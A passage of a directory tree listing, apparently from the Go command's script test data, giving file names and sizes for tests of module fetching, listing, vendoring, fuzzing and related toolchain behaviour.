│ │ │ │ │ ├── [ 201] fileline.txt
│ │ │ │ │ ├── [ 775] fmt_load_errors.txt
│ │ │ │ │ ├── [ 408] gccgo_link_c.txt
│ │ │ │ │ ├── [ 137] gccgo_mangle.txt
│ │ │ │ │ ├── [ 315] gccgo_m.txt
│ │ │ │ │ ├── [2.4K] gcflags_patterns.txt
│ │ │ │ │ ├── [ 275] generate_bad_imports.txt
│ │ │ │ │ ├── [ 544] generate_env.txt
│ │ │ │ │ ├── [4.1K] generate_invalid.txt
│ │ │ │ │ ├── [2.4K] generate.txt
│ │ │ │ │ ├── [ 333] get_404_meta.txt
│ │ │ │ │ ├── [1.3K] get_brace.txt
│ │ │ │ │ ├── [ 110] get_custom_domain_wildcard.txt
│ │ │ │ │ ├── [ 189] get_dash_t.txt
│ │ │ │ │ ├── [ 595] get_domain_root.txt
│ │ │ │ │ ├── [1.6K] get_dotfiles.txt
│ │ │ │ │ ├── [ 178] get_dot_slash_download.txt
│ │ │ │ │ ├── [2.0K] get_go_file.txt
│ │ │ │ │ ├── [1.5K] get_goroot.txt
│ │ │ │ │ ├── [ 220] get_insecure_custom_domain.txt
│ │ │ │ │ ├── [1022] get_insecure_env.txt
│ │ │ │ │ ├── [ 364] get_insecure_no_longer_supported.txt
│ │ │ │ │ ├── [ 469] get_insecure_redirect.txt
│ │ │ │ │ ├── [1.4K] get_insecure.txt
│ │ │ │ │ ├── [ 432] get_insecure_update.txt
│ │ │ │ │ ├── [ 151] get_internal_wildcard.txt
│ │ │ │ │ ├── [ 235] get_issue11307.txt
│ │ │ │ │ ├── [1.9K] get_legacy.txt
│ │ │ │ │ ├── [ 297] get_non_pkg.txt
│ │ │ │ │ ├── [ 135] get_race.txt
│ │ │ │ │ ├── [ 125] get_test_only.txt
│ │ │ │ │ ├── [ 779] get_tilde.txt
│ │ │ │ │ ├── [ 250] get_update_all.txt
│ │ │ │ │ ├── [ 617] get_update.txt
│ │ │ │ │ ├── [ 469] get_update_unknown_protocol.txt
│ │ │ │ │ ├── [ 518] get_update_wildcard.txt
│ │ │ │ │ ├── [ 211] get_vcs_error_message.txt
│ │ │ │ │ ├── [1.9K] get_vendor.txt
│ │ │ │ │ ├── [ 139] get_with_git_trace.txt
│ │ │ │ │ ├── [1.4K] goflags.txt
│ │ │ │ │ ├── [1.6K] gopath_install.txt
│ │ │ │ │ ├── [2.9K] gopath_local.txt
│ │ │ │ │ ├── [1.7K] gopath_moved_repo.txt
│ │ │ │ │ ├── [1.1K] gopath_paths.txt
│ │ │ │ │ ├── [1.4K] gopath_std_vendor.txt
│ │ │ │ │ ├── [ 411] gopath_vendor_dup_err.txt
│ │ │ │ │ ├── [2.6K] goroot_executable.txt
│ │ │ │ │ ├── [6.3K] govcs.txt
│ │ │ │ │ ├── [ 236] go_version.txt
│ │ │ │ │ ├── [1.2K] help.txt
│ │ │ │ │ ├── [ 235] import_cycle.txt
│ │ │ │ │ ├── [ 156] import_ignore.txt
│ │ │ │ │ ├── [1.7K] import_main.txt
│ │ │ │ │ ├── [ 178] install_cgo_excluded.txt
│ │ │ │ │ ├── [ 507] install_cleans_build.txt
│ │ │ │ │ ├── [ 370] install_cmd_gobin.txt
│ │ │ │ │ ├── [ 660] install_cross_gobin.txt
│ │ │ │ │ ├── [ 365] install_msan_and_race_require_cgo.txt
│ │ │ │ │ ├── [ 465] install_rebuild_gopath.txt
│ │ │ │ │ ├── [ 688] install_rebuild_removed.txt
│ │ │ │ │ ├── [ 159] install_relative_gobin_fail.txt
│ │ │ │ │ ├── [ 428] install_shadow_gopath.txt
│ │ │ │ │ ├── [ 112] issue36000.txt
│ │ │ │ │ ├── [ 762] ldflag.txt
│ │ │ │ │ ├── [ 805] link_external_undef.txt
│ │ │ │ │ ├── [ 835] link_matching_actionid.txt
│ │ │ │ │ ├── [ 210] linkname.txt
│ │ │ │ │ ├── [ 962] link_syso_issue33139.txt
│ │ │ │ │ ├── [ 657] list_all_gobuild.txt
│ │ │ │ │ ├── [1.1K] list_ambiguous_path.txt
│ │ │ │ │ ├── [2.1K] list_bad_import.txt
│ │ │ │ │ ├── [1.0K] list_case_collision.txt
│ │ │ │ │ ├── [1.5K] list_cgo_compiled_importmap.txt
│ │ │ │ │ ├── [ 681] list_compiled_imports.txt
│ │ │ │ │ ├── [1.7K] list_constraints.txt
│ │ │ │ │ ├── [ 613] list_dedup_packages.txt
│ │ │ │ │ ├── [ 288] list_err_cycle.txt
│ │ │ │ │ ├── [ 595] list_err_stack.txt
│ │ │ │ │ ├── [ 737] list_find_nodeps.txt
│ │ │ │ │ ├── [ 748] list_find.txt
│ │ │ │ │ ├── [1.7K] list_gofile_in_goroot.txt
│ │ │ │ │ ├── [ 421] list_gomod_in_gopath.txt
│ │ │ │ │ ├── [ 947] list_importmap.txt
│ │ │ │ │ ├── [ 928] list_json_fields.txt
│ │ │ │ │ ├── [ 459] list_json_with_f.txt
│ │ │ │ │ ├── [ 297] list_linkshared.txt
│ │ │ │ │ ├── [1.7K] list_load_err.txt
│ │ │ │ │ ├── [ 276] list_module_when_error.txt
│ │ │ │ │ ├── [1.3K] list_overlay.txt
│ │ │ │ │ ├── [1.3K] list_parse_err.txt
│ │ │ │ │ ├── [1.9K] list_permissions.txt
│ │ │ │ │ ├── [ 293] list_reserved.txt
│ │ │ │ │ ├── [1.2K] list_shadow.txt
│ │ │ │ │ ├── [ 439] list_split_main.txt
│ │ │ │ │ ├── [ 693] list_std.txt
│ │ │ │ │ ├── [ 857] list_std_vendor.txt
│ │ │ │ │ ├── [ 563] list_swigcxx.txt
│ │ │ │ │ ├── [ 529] list_symlink_internal.txt
│ │ │ │ │ ├── [ 360] list_symlink_issue35941.txt
│ │ │ │ │ ├── [ 223] list_symlink.txt
│ │ │ │ │ ├── [ 511] list_symlink_vendor_issue14054.txt
│ │ │ │ │ ├── [ 543] list_symlink_vendor_issue15201.txt
│ │ │ │ │ ├── [3.1K] list_test_err.txt
│ │ │ │ │ ├── [ 239] list_test_e.txt
│ │ │ │ │ ├── [ 474] list_test_imports.txt
│ │ │ │ │ ├── [ 289] list_test_non_go_files.txt
│ │ │ │ │ ├── [ 856] list_test_simple.txt
│ │ │ │ │ ├── [ 344] list_wildcard_skip_nonmatching.txt
│ │ │ │ │ ├── [ 484] load_test_pkg_err.txt
│ │ │ │ │ ├── [ 13K] mod_all.txt
│ │ │ │ │ ├── [ 535] mod_alt_goroot.txt
│ │ │ │ │ ├── [1.4K] mod_ambiguous_import.txt
│ │ │ │ │ ├── [ 762] mod_auth.txt
│ │ │ │ │ ├── [1.5K] mod_bad_domain.txt
│ │ │ │ │ ├── [ 708] mod_bad_filenames.txt
│ │ │ │ │ ├── [ 972] mod_build_info_err.txt
│ │ │ │ │ ├── [ 538] mod_build_tags.txt
│ │ │ │ │ ├── [1.3K] mod_build_trimpath_issue48557.txt
│ │ │ │ │ ├── [ 343] mod_build_versioned.txt
│ │ │ │ │ ├── [ 289] mod_cache_dir.txt
│ │ │ │ │ ├── [2.0K] mod_cache_rw.txt
│ │ │ │ │ ├── [ 108] mod_case_cgo.txt
│ │ │ │ │ ├── [ 453] mod_case.txt
│ │ │ │ │ ├── [1.8K] mod_clean_cache.txt
│ │ │ │ │ ├── [ 800] mod_concurrent.txt
│ │ │ │ │ ├── [ 963] mod_convert_dep.txt
│ │ │ │ │ ├── [1.1K] mod_convert_git.txt
│ │ │ │ │ ├── [ 460] mod_convert_glide.txt
│ │ │ │ │ ├── [ 458] mod_convert_glockfile.txt
│ │ │ │ │ ├── [ 479] mod_convert_godeps.txt
│ │ │ │ │ ├── [ 631] mod_convert_tsv_insecure.txt
│ │ │ │ │ ├── [ 472] mod_convert_tsv.txt
│ │ │ │ │ ├── [2.5K] mod_convert.txt
│ │ │ │ │ ├── [ 462] mod_convert_vendor_conf.txt
│ │ │ │ │ ├── [ 475] mod_convert_vendor_json.txt
│ │ │ │ │ ├── [ 469] mod_convert_vendor_manifest.txt
│ │ │ │ │ ├── [ 460] mod_convert_vendor_yml.txt
│ │ │ │ │ ├── [2.8K] mod_deprecate_message.txt
│ │ │ │ │ ├── [ 221] mod_dir.txt
│ │ │ │ │ ├── [ 532] mod_doc_path.txt
│ │ │ │ │ ├── [2.6K] mod_doc.txt
│ │ │ │ │ ├── [ 190] mod_domain_root.txt
│ │ │ │ │ ├── [4.6K] mod_dot.txt
│ │ │ │ │ ├── [2.5K] mod_download_concurrent_read.txt
│ │ │ │ │ ├── [ 877] mod_download_hash.txt
│ │ │ │ │ ├── [ 938] mod_download_insecure_redirect.txt
│ │ │ │ │ ├── [ 243] mod_download_json.txt
│ │ │ │ │ ├── [2.1K] mod_download_partial.txt
│ │ │ │ │ ├── [1.6K] mod_download_private_vcs.txt
│ │ │ │ │ ├── [ 398] mod_download_replace_file.txt
│ │ │ │ │ ├── [1.3K] mod_download_svn.txt
│ │ │ │ │ ├── [ 245] mod_download_too_many_redirects.txt
│ │ │ │ │ ├── [8.5K] mod_download.txt
│ │ │ │ │ ├── [ 438] mod_edit_go.txt
│ │ │ │ │ ├── [ 419] mod_edit_no_modcache.txt
│ │ │ │ │ ├── [5.9K] mod_edit.txt
│ │ │ │ │ ├── [ 923] mod_empty_err.txt
│ │ │ │ │ ├── [1.7K] mod_enabled.txt
│ │ │ │ │ ├── [3.6K] mod_e.txt
│ │ │ │ │ ├── [2.6K] modfile_flag.txt
│ │ │ │ │ ├── [1.2K] mod_file_proxy.txt
│ │ │ │ │ ├── [2.4K] mod_find.txt
│ │ │ │ │ ├── [1.7K] mod_fs_patterns.txt
│ │ │ │ │ ├── [1.9K] mod_get_ambiguous_arg.txt
│ │ │ │ │ ├── [1.4K] mod_get_ambiguous_import.txt
│ │ │ │ │ ├── [2.6K] mod_get_ambiguous_pkg.txt
│ │ │ │ │ ├── [1.7K] mod_get_changes.txt
│ │ │ │ │ ├── [1.5K] mod_get_commit.txt
│ │ │ │ │ ├── [1.9K] mod_get_deprecated.txt
│ │ │ │ │ ├── [1.1K] mod_get_deprecate_install.txt
│ │ │ │ │ ├── [ 430] mod_get_direct.txt
│ │ │ │ │ ├── [1.3K] mod_get_downadd_indirect.txt
│ │ │ │ │ ├── [1.3K] mod_get_downgrade_missing.txt
│ │ │ │ │ ├── [1.4K] mod_get_downgrade.txt
│ │ │ │ │ ├── [2.9K] mod_get_downup_artifact.txt
│ │ │ │ │ ├── [1.6K] mod_get_downup_indirect.txt
│ │ │ │ │ ├── [2.1K] mod_get_downup_pseudo_artifact.txt
│ │ │ │ │ ├── [1.3K] mod_get_errors.txt
│ │ │ │ │ ├── [1.4K] mod_get_extra.txt
│ │ │ │ │ ├── [ 275] mod_get_fallback.txt
│ │ │ │ │ ├── [ 772] mod_get_fossil.txt
│ │ │ │ │ ├── [2.3K] mod_get_go_file.txt
│ │ │ │ │ ├── [ 620] mod_get_hash.txt
│ │ │ │ │ ├── [ 430] mod_get_incompatible.txt
│ │ │ │ │ ├── [1.6K] mod_get_indirect.txt
│ │ │ │ │ ├── [ 798] mod_get_issue37438.txt
│ │ │ │ │ ├── [2.2K] mod_get_issue47979.txt
│ │ │ │ │ ├── [1.1K] mod_get_issue48511.txt
│ │ │ │ │ ├── [ 275] mod_get_latest_pseudo.txt
│ │ │ │ │ ├── [1.2K] mod_get_lazy_indirect.txt
│ │ │ │ │ ├── [1.6K] mod_get_lazy_upgrade_lazy.txt
│ │ │ │ │ ├── [1.5K] mod_get_local.txt
│ │ │ │ │ ├── [1.7K] mod_get_main.txt
│ │ │ │ │ ├── [ 620] mod_get_major.txt
│ │ │ │ │ ├── [2.4K] mod_get_missing_ziphash.txt
│ │ │ │ │ ├── [1.0K] mod_getmode_vendor.txt
│ │ │ │ │ ├── [1.3K] mod_get_moved.txt
│ │ │ │ │ ├── [ 448] mod_get_newcycle.txt
│ │ │ │ │ ├── [ 253] mod_get_none.txt
│ │ │ │ │ ├── [1.3K] mod_get_nopkgs.txt
│ │ │ │ │ ├── [1.3K] mod_get_patchbound.txt
│ │ │ │ │ ├── [1.1K] mod_get_patchcycle.txt
│ │ │ │ │ ├── [2.1K] mod_get_patchmod.txt
│ │ │ │ │ ├── [2.9K] mod_get_patch.txt
│ │ │ │ │ ├── [1.3K] mod_get_patterns.txt
│ │ │ │ │ ├── [3.6K] mod_get_pkgtags.txt
│ │ │ │ │ ├── [ 895] mod_get_prefer_incompatible.txt
│ │ │ │ │ ├── [2.2K] mod_get_promote_implicit.txt
│ │ │ │ │ ├── [1.5K] mod_get_pseudo_other_branch.txt
│ │ │ │ │ ├── [1.6K] mod_get_pseudo_prefix.txt
│ │ │ │ │ ├── [2.2K] mod_get_pseudo.txt
│ │ │ │ │ ├── [2.5K] mod_get_replaced.txt
│ │ │ │ │ ├── [ 371] mod_get_retract_ambiguous.txt
│ │ │ │ │ ├── [2.1K] mod_get_retract.txt
│ │ │ │ │ ├── [4.8K] mod_get_split.txt
│ │ │ │ │ ├── [ 503] mod_get_sum_noroot.txt
│ │ │ │ │ ├── [ 566] mod_get_tags.txt
│ │ │ │ │ ├── [1.2K] mod_get_test.txt
│ │ │ │ │ ├── [ 982] mod_get_trailing_slash.txt
│ │ │ │ │ ├── [3.5K] mod_get_update_unrelated_sum.txt
│ │ │ │ │ ├── [2.2K] mod_get_upgrade_pseudo.txt
│ │ │ │ │ ├── [1.2K] mod_get_upgrade.txt
│ │ │ │ │ ├── [1.9K] mod_get_wild.txt
│ │ │ │ │ ├── [ 429] mod_getx.txt
│ │ │ │ │ ├── [ 549] mod_git_export_subst.txt
│ │ │ │ │ ├── [3.0K] mod_gobuild_import.txt
│ │ │ │ │ ├── [ 207] mod_gofmt_invalid.txt
│ │ │ │ │ ├── [2.4K] mod_gomodcache.txt
│ │ │ │ │ ├── [1.6K] mod_gonoproxy.txt
│ │ │ │ │ ├── [ 422] mod_gopkg_unstable.txt
│ │ │ │ │ ├── [1.8K] mod_goroot_errors.txt
│ │ │ │ │ ├── [3.1K] mod_go_version_missing.txt
│ │ │ │ │ ├── [ 646] mod_go_version_mixed.txt
│ │ │ │ │ ├── [1.7K] mod_go_version.txt
│ │ │ │ │ ├── [ 207] mod_graph.txt
│ │ │ │ │ ├── [3.3K] mod_graph_version.txt
│ │ │ │ │ ├── [ 132] mod_help.txt
│ │ │ │ │ ├── [ 644] mod_import_cycle.txt
│ │ │ │ │ ├── [ 932] mod_import_issue41113.txt
│ │ │ │ │ ├── [ 250] mod_import_issue42891.txt
│ │ │ │ │ ├── [1.1K] mod_import_meta.txt
│ │ │ │ │ ├── [ 143] mod_import_mod.txt
│ │ │ │ │ ├── [ 374] mod_import.txt
│ │ │ │ │ ├── [ 184] mod_import_v1suffix.txt
│ │ │ │ │ ├── [1.4K] mod_indirect_main.txt
│ │ │ │ │ ├── [ 516] mod_indirect_nospace.txt
│ │ │ │ │ ├── [ 804] mod_indirect_tidy.txt
│ │ │ │ │ ├── [1.3K] mod_indirect.txt
│ │ │ │ │ ├── [ 633] mod_init_dep.txt
│ │ │ │ │ ├── [ 192] mod_init_empty.txt
│ │ │ │ │ ├── [ 595] mod_init_glide.txt
│ │ │ │ │ ├── [5.5K] mod_init_invalid_major.txt
│ │ │ │ │ ├── [ 248] mod_init_path.txt
│ │ │ │ │ ├── [ 955] mod_init_tidy.txt
│ │ │ │ │ ├── [ 239] mod_install_hint.txt
│ │ │ │ │ ├── [7.8K] mod_install_pkg_version.txt
│ │ │ │ │ ├── [ 258] mod_install_versioned.txt
│ │ │ │ │ ├── [2.4K] mod_internal.txt
│ │ │ │ │ ├── [ 969] mod_in_testdata_dir.txt
│ │ │ │ │ ├── [1.1K] mod_invalid_path_dotname.txt
│ │ │ │ │ ├── [ 821] mod_invalid_path_plus.txt
│ │ │ │ │ ├── [1.7K] mod_invalid_path.txt
│ │ │ │ │ ├── [ 13K] mod_invalid_version.txt
│ │ │ │ │ ├── [ 244] mod_issue35317.txt
│ │ │ │ │ ├── [1.9K] mod_lazy_consistency.txt
│ │ │ │ │ ├── [3.7K] mod_lazy_downgrade.txt
│ │ │ │ │ ├── [3.1K] mod_lazy_import_allmod.txt
│ │ │ │ │ ├── [3.0K] mod_lazy_new_import.txt
│ │ │ │ │ ├── [1.9K] mod_lazy_test_horizon.txt
│ │ │ │ │ ├── [5.2K] mod_lazy_test_of_test_dep.txt
│ │ │ │ │ ├── [2.4K] mod_list_bad_import.txt
│ │ │ │ │ ├── [ 622] mod_list_command_line_arguments.txt
│ │ │ │ │ ├── [1.7K] mod_list_compiled_concurrent.txt
│ │ │ │ │ ├── [2.3K] mod_list_deprecated_replace.txt
│ │ │ │ │ ├── [1.8K] mod_list_deprecated.txt
│ │ │ │ │ ├── [ 518] mod_list_direct.txt
│ │ │ │ │ ├── [ 854] mod_list_dir.txt
│ │ │ │ │ ├── [ 449] mod_list_e_readonly.txt
│ │ │ │ │ ├── [1.7K] mod_list_pseudo.txt
│ │ │ │ │ ├── [ 681] mod_list_replace_dir.txt
│ │ │ │ │ ├── [4.8K] mod_list_retract.txt
│ │ │ │ │ ├── [2.7K] mod_list_std.txt
│ │ │ │ │ ├── [1.3K] mod_list_sums.txt
│ │ │ │ │ ├── [ 582] mod_list_test_cycle.txt
│ │ │ │ │ ├── [ 704] mod_list_test.txt
│ │ │ │ │ ├── [2.0K] mod_list.txt
│ │ │ │ │ ├── [2.0K] mod_list_update_nolatest.txt
│ │ │ │ │ ├── [ 779] mod_list_upgrade_pseudo.txt
│ │ │ │ │ ├── [ 196] mod_list_upgrade.txt
│ │ │ │ │ ├── [3.7K] mod_load_badchain.txt
│ │ │ │ │ ├── [ 524] mod_load_badmod.txt
│ │ │ │ │ ├── [ 403] mod_load_badzip.txt
│ │ │ │ │ ├── [ 618] mod_load_replace_mismatch.txt
│ │ │ │ │ ├── [ 329] mod_local_replace.txt
│ │ │ │ │ ├── [ 357] mod_missingpkg_prerelease.txt
│ │ │ │ │ ├── [ 538] mod_missing_repo.txt
│ │ │ │ │ ├── [1.8K] mod_modinfo.txt
│ │ │ │ │ ├── [ 892] mod_multirepo.txt
│ │ │ │ │ ├── [ 296] mod_no_gopath.txt
│ │ │ │ │ ├── [ 644] mod_nomod.txt
│ │ │ │ │ ├── [2.1K] mod_notall.txt
│ │ │ │ │ ├── [ 216] mod_off_init.txt
│ │ │ │ │ ├── [1.0K] mod_off.txt
│ │ │ │ │ ├── [ 11K] mod_outside.txt
│ │ │ │ │ ├── [7.7K] mod_overlay.txt
│ │ │ │ │ ├── [2.4K] mod_patterns.txt
│ │ │ │ │ ├── [ 528] mod_patterns_vendor.txt
│ │ │ │ │ ├── [1.2K] mod_permissions.txt
│ │ │ │ │ ├── [2.6K] mod_prefer_compatible.txt
│ │ │ │ │ ├── [ 697] mod_proxy_errors.txt
│ │ │ │ │ ├── [ 475] mod_proxy_https.txt
│ │ │ │ │ ├── [ 397] mod_proxy_invalid.txt
│ │ │ │ │ ├── [1.1K] mod_proxy_list.txt
│ │ │ │ │ ├── [1.1K] mod_pseudo_cache.txt
│ │ │ │ │ ├── [2.7K] mod_query_empty.txt
│ │ │ │ │ ├── [1.1K] mod_query_exclude.txt
│ │ │ │ │ ├── [1.6K] mod_query_main.txt
│ │ │ │ │ ├── [1.3K] mod_query.txt
│ │ │ │ │ ├── [3.1K] mod_readonly.txt
│ │ │ │ │ ├── [2.4K] mod_replace_gopkgin.txt
│ │ │ │ │ ├── [2.7K] mod_replace_import.txt
│ │ │ │ │ ├── [1.8K] mod_replace_readonly.txt
│ │ │ │ │ ├── [3.7K] mod_replace.txt
│ │ │ │ │ ├── [2.7K] mod_require_exclude.txt
│ │ │ │ │ ├── [3.0K] mod_retention.txt
│ │ │ │ │ ├── [1.1K] mod_retract_fix_version.txt
│ │ │ │ │ ├── [ 716] mod_retract_incompatible.txt
│ │ │ │ │ ├── [2.4K] mod_retract_pseudo_base.txt
│ │ │ │ │ ├── [3.2K] mod_retract_rationale.txt
│ │ │ │ │ ├── [ 863] mod_retract_rename.txt
│ │ │ │ │ ├── [2.0K] mod_retract_replace.txt
│ │ │ │ │ ├── [1.4K] mod_retract.txt
│ │ │ │ │ ├── [ 981] mod_retract_versions.txt
│ │ │ │ │ ├── [ 435] mod_run_nonmain.txt
│ │ │ │ │ ├── [ 359] mod_run_path.txt
│ │ │ │ │ ├── [ 877] mod_run_pkgerror.txt
│ │ │ │ │ ├── [3.6K] mod_run_pkg_version.txt
│ │ │ │ │ ├── [2.4K] mod_skip_write.txt
│ │ │ │ │ ├── [1.8K] mod_std_vendor.txt
│ │ │ │ │ ├── [ 146] mod_string_alias.txt
│ │ │ │ │ ├── [2.9K] mod_sum_ambiguous.txt
│ │ │ │ │ ├── [1.1K] mod_sumdb_cache.txt
│ │ │ │ │ ├── [2.3K] mod_sumdb_file_path.txt
│ │ │ │ │ ├── [1.8K] mod_sumdb_golang.txt
│ │ │ │ │ ├── [1.8K] mod_sumdb_proxy.txt
│ │ │ │ │ ├── [1.2K] mod_sumdb.txt
│ │ │ │ │ ├── [ 859] mod_sum_lookup.txt
│ │ │ │ │ ├── [3.9K] mod_sum_readonly.txt
│ │ │ │ │ ├── [ 677] mod_sum_replaced.txt
│ │ │ │ │ ├── [ 372] mod_symlink_dotgo.txt
│ │ │ │ │ ├── [1.1K] mod_symlink.txt
│ │ │ │ │ ├── [2.2K] mod_tagged_import_cycle.txt
│ │ │ │ │ ├── [1.5K] mod_test_cached.txt
│ │ │ │ │ ├── [1.1K] mod_test_files.txt
│ │ │ │ │ ├── [2.2K] mod_test.txt
│ │ │ │ │ ├── [2.4K] mod_tidy_compat_added.txt
│ │ │ │ │ ├── [3.1K] mod_tidy_compat_ambiguous.txt
│ │ │ │ │ ├── [3.0K] mod_tidy_compat_deleted.txt
│ │ │ │ │ ├── [4.4K] mod_tidy_compat_implicit.txt
│ │ │ │ │ ├── [4.5K] mod_tidy_compat_incompatible.txt
│ │ │ │ │ ├── [2.8K] mod_tidy_compat_irrelevant.txt
│ │ │ │ │ ├── [2.5K] mod_tidy_compat.txt
│ │ │ │ │ ├── [9.2K] mod_tidy_convergence_loop.txt
│ │ │ │ │ ├── [5.5K] mod_tidy_convergence.txt
│ │ │ │ │ ├── [ 949] mod_tidy_cycle.txt
│ │ │ │ │ ├── [1.9K] mod_tidy_downgrade_ambiguous.txt
│ │ │ │ │ ├── [1.2K] mod_tidy_error.txt
│ │ │ │ │ ├── [1.1K] mod_tidy_indirect.txt
│ │ │ │ │ ├── [1.5K] mod_tidy_lazy_self.txt
│ │ │ │ │ ├── [1.5K] mod_tidy_newroot.txt
│ │ │ │ │ ├── [ 489] mod_tidy_oldgo.txt
│ │ │ │ │ ├── [1.4K] mod_tidy_old.txt
│ │ │ │ │ ├── [ 429] mod_tidy_quote.txt
│ │ │ │ │ ├── [1000] mod_tidy_replace_old.txt
│ │ │ │ │ ├── [3.0K] mod_tidy_replace.txt
│ │ │ │ │ ├── [ 742] mod_tidy_sum.txt
│ │ │ │ │ ├── [ 898] mod_tidy_symlink_issue35941.txt
│ │ │ │ │ ├── [1.3K] mod_tidy_too_new.txt
│ │ │ │ │ ├── [ 897] mod_tidy.txt
│ │ │ │ │ ├── [4.9K] mod_tidy_version.txt
│ │ │ │ │ ├── [1.2K] mod_update_sum_readonly.txt
│ │ │ │ │ ├── [3.6K] mod_upgrade_patch.txt
│ │ │ │ │ ├── [ 499] mod_vcs_missing.txt
│ │ │ │ │ ├── [9.3K] mod_vendor_auto.txt
│ │ │ │ │ ├── [ 931] mod_vendor_build.txt
│ │ │ │ │ ├── [3.4K] mod_vendor_embed.txt
│ │ │ │ │ ├── [ 633] mod_vendor_gomod.txt
│ │ │ │ │ ├── [2.3K] mod_vendor_goversion.txt
│ │ │ │ │ ├── [ 675] mod_vendor_issue46867.txt
│ │ │ │ │ ├── [ 118] mod_vendor_nodeps.txt
│ │ │ │ │ ├── [ 507] mod_vendor_redundant_requirement.txt
│ │ │ │ │ ├── [2.1K] mod_vendor_replace.txt
│ │ │ │ │ ├── [1.3K] mod_vendor_trimpath.txt
│ │ │ │ │ ├── [7.5K] mod_vendor.txt
│ │ │ │ │ ├── [ 459] mod_vendor_unused_only.txt
│ │ │ │ │ ├── [1.4K] mod_vendor_unused.txt
│ │ │ │ │ ├── [2.3K] mod_verify.txt
│ │ │ │ │ ├── [ 571] mod_versions.txt
│ │ │ │ │ ├── [2.6K] mod_why.txt
│ │ │ │ │ ├── [ 356] noncanonical_import.txt
│ │ │ │ │ ├── [ 185] pattern_syntax_error.txt
│ │ │ │ │ ├── [ 175] prevent_sys_unix_import.txt
│ │ │ │ │ ├── [ 12K] README
│ │ │ │ │ ├── [ 449] run_dirs.txt
│ │ │ │ │ ├── [ 186] run_hello_pkg.txt
│ │ │ │ │ ├── [ 140] run_hello.txt
│ │ │ │ │ ├── [1.1K] run_internal.txt
│ │ │ │ │ ├── [ 217] run_issue11709.txt
│ │ │ │ │ ├── [1.3K] run_issue51125.txt
│ │ │ │ │ ├── [ 627] run_set_executable_name.txt
│ │ │ │ │ ├── [ 532] run_vendor.txt
│ │ │ │ │ ├── [ 219] run_wildcard.txt
│ │ │ │ │ ├── [ 216] run_work_versioned.txt
│ │ │ │ │ ├── [ 591] script_wait.txt
│ │ │ │ │ ├── [ 966] std_vendor.txt
│ │ │ │ │ ├── [ 234] test_bad_example.txt
│ │ │ │ │ ├── [ 805] test_badtest.txt
│ │ │ │ │ ├── [ 532] test_benchmark_1x.txt
│ │ │ │ │ ├── [ 739] test_benchmark_chatty_fail.txt
│ │ │ │ │ ├── [ 629] test_benchmark_chatty_success.txt
│ │ │ │ │ ├── [ 339] test_benchmark_fatal.txt
│ │ │ │ │ ├── [ 412] test_benchmark_labels.txt
│ │ │ │ │ ├── [ 265] test_benchmark_timeout.txt
│ │ │ │ │ ├── [ 377] test_build_failure.txt
│ │ │ │ │ ├── [2.2K] test_buildvcs.txt
│ │ │ │ │ ├── [6.0K] test_cache_inputs.txt
│ │ │ │ │ ├── [ 719] test_chatty_fail.txt
│ │ │ │ │ ├── [2.8K] test_chatty_parallel_fail.txt
│ │ │ │ │ ├── [1.0K] test_chatty_parallel_success_run.txt
│ │ │ │ │ ├── [2.6K] test_chatty_parallel_success.txt
│ │ │ │ │ ├── [ 937] test_chatty_success.txt
│ │ │ │ │ ├── [1.4K] test_cleanup_failnow.txt
│ │ │ │ │ ├── [ 136] test_compile_binary.txt
│ │ │ │ │ ├── [ 271] test_compile_tempfile.txt
│ │ │ │ │ ├── [1.2K] test_deadline.txt
│ │ │ │ │ ├── [1.0K] test_empty.txt
│ │ │ │ │ ├── [ 260] test_env_term.txt
│ │ │ │ │ ├── [ 403] test_example_goexit.txt
│ │ │ │ │ ├── [2.5K] test_exit.txt
│ │ │ │ │ ├── [3.3K] test_fail_fast.txt
│ │ │ │ │ ├── [1.4K] test_fail_newline.txt
│ │ │ │ │ ├── [1.0K] test_finished_subtest_goroutines.txt
│ │ │ │ │ ├── [4.0K] test_flags.txt
│ │ │ │ │ ├── [ 985] test_flag.txt
│ │ │ │ │ ├── [1.8K] test_fuzz_cache.txt
│ │ │ │ │ ├── [1.8K] test_fuzz_chatty.txt
│ │ │ │ │ ├── [1.3K] test_fuzz_cleanup.txt
│ │ │ │ │ ├── [ 655] test_fuzz_cov.txt
│ │ │ │ │ ├── [1.0K] test_fuzz_deadline.txt
│ │ │ │ │ ├── [1.0K] test_fuzz_dup_cache.txt
│ │ │ │ │ ├── [2.7K] test_fuzz_fuzztime.txt
│ │ │ │ │ ├── [2.6K] test_fuzz_io_error.txt
│ │ │ │ │ ├── [ 916] test_fuzz_match.txt
│ │ │ │ │ ├── [1.9K] test_fuzz_minimize_dirty_cov.txt
│ │ │ │ │ ├── [5.5K] test_fuzz_minimize_interesting.txt
│ │ │ │ │ ├── [5.8K] test_fuzz_minimize.txt
│ │ │ │ │ ├── [1.8K] test_fuzz_modcache.txt
│ │ │ │ │ ├── [1.2K] test_fuzz_multiple.txt
│ │ │ │ │ ├── [8.3K] test_fuzz_mutate_crash.txt
│ │ │ │ │ ├── [1.5K] test_fuzz_mutate_fail.txt
│ │ │ │ │ ├── [1.9K] test_fuzz_mutator_repeat.txt
│ │ │ │ │ ├── [3.6K] test_fuzz_mutator.txt
│ │ │ │ │ ├── [1.9K] test_fuzz_non_crash_signal.txt
│ │ │ │ │ ├── [1.6K] test_fuzz_parallel.txt
│ │ │ │ │ ├── [ 855] test_fuzz_profile_flags.txt
│ │ │ │ │ ├── [ 314] test_fuzz_return.txt
│ │ │ │ │ ├── [3.0K] test_fuzz_run.txt
│ │ │ │ │ ├── [6.1K] test_fuzz_seed_corpus.txt
│ │ │ │ │ ├── [ 919] test_fuzz_setenv.txt
│ │ │ │ │ ├── [ 942] test_fuzz_test_race.txt
│ │ │ │ │ ├── [ 10K] test_fuzz.txt
│ │ │ │ │ ├── [ 283] test_fuzz_unsupported.txt
│ │ │ │ │ ├── [ 924] test_generated_main.txt
│ │ │ │ │ ├── [ 206] test_go111module_cache.txt
│ │ │ │ │ ├── [ 997] test_import_error_stack.txt
│ │ │ │ │ ├── [ 336] testing_issue40908.txt
│ │ │ │ │ ├── [ 168] test_issue45477.txt
│ │ │ │ │ ├── [2.0K] test_json_exit.txt
│ │ │ │ │ ├── [ 581] test_json_interleaved.txt
│ │ │ │ │ ├── [1.2K] test_json_panic_exit.txt
│ │ │ │ │ ├── [2.0K] test_json.txt
│ │ │ │ │ ├── [ 436] test_main_archive.txt
│ │ │ │ │ ├── [ 603] test_main_panic.txt
│ │ │ │ │ ├── [ 511] test_main_twice.txt
│ │ │ │ │ ├── [2.2K] test_main.txt
│ │ │ │ │ ├── [ 577] test_match_benchmark_labels.txt
